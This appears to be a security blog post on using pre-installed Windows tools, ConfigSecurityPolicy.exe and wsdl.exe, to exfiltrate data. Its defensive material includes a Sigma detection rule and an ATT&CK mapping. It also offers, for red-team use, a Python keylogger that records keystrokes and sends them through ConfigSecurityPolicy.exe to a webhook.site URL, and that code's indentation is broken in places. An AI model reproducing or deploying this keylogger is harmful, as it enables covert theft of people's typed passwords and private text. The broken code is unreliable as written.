Data Exfiltration with LOLBins [part 1]

The term “living off the land” (LOL) was coined by malware researchers Christopher Campbell and Matt Greaber to explain the use of trusted, pre-installed system tools to spread malware. There are a few different types of LOL techniques, including LOLBins, which use Windows binaries to hide malicious activity; LOLLibs, which use libraries; and LOLScripts, which use scripts[1].

You can check a lof of tricks on “https://github.com/LOLBAS-Project/LOLBAS” — Living Off The Land Binaries And Scripts — (LOLBins and LOLScripts).

My first discover was a simple way to abuse Microsoft Windows Defender utility [“C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9–0\ConfigSecurityPolicy.exe”] to exfil data:

ConfigSecurityPolicy.exe

Looking for a little more, I found another way with wsdl.exe (Microsoft Web Services Description Language Utility), The .NET Framework SDK includes the Web Services Description Language tool (Wsdl.exe), which enables you to generate a Web service proxy for use in the .NET Framework development environment. The most common way to create a client proxy in languages that support Web services (currently C# and Microsoft Visual Basic) is to use the WSDL tool [More info]:

wsdl.exe

Blueteam/Redteam tips:

• UserAgent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.9151)
• A simple sigma rule to help possible insider threat:

logsource:
product: windows
category: process_creation
detection
selection:
Image: '*\ConfigSecurityPolicy.exe'
mandatory_cmdline:
Commandline|all:
- '*ConfigSecurityPolicy.exe*'
- '*.xml'
condition: selection and not mandatory_cmdline

Reference: Hunting for LoLBins

A piece of code to help readteam usage(thanks Neriberto Prado ❤), a simple keylogger abusing Windows Defender to exfil logs:

# From: https://github.com/moses-palmer/pynput
from pynput.keyboard import Key, Listener
import os
import sys
import subprocess
URL = 'https://webhook.site/xxxxxx-xxxxx-xxxx-xxxxx-xxxxxxx'
uploader = "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\ConfigSecurityPolicy.exe"
content = ""
def on_press(key):
    global content
    global URL
    global uploader
    if str(key) == 'Key.backspace':
        content += ' '
    else:
        content += str(key)
print(f'last key: {str(key)}')
    print("")
if str(key) == 'Key.enter':
        upload_url = (f'{URL}?{content}')
        subprocess.call([uploader, 'c:\\temp\\test.xml', upload_url])
        buffer = ''
if key == 0x03:
        sys.exit(0)
if __name__ == "__main__":
    try:
        with Listener(on_press=on_press) as listener:
            listener.join()
    except (KeyboardInterrupt, SystemExit):
        sys.exit(0)

Proof of Concept

MITRE ATT&CK Techniques:

• ID: T1105
• Sub-techniques: No sub-techniques
• Tactic: Command And Control
• Platforms: Linux, Windows, macOS
• Permissions Required: User
• Data Sources: File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network

Finally, a simple and effective way to simulate possible tactics of your opponents, soon I will come back with more tips.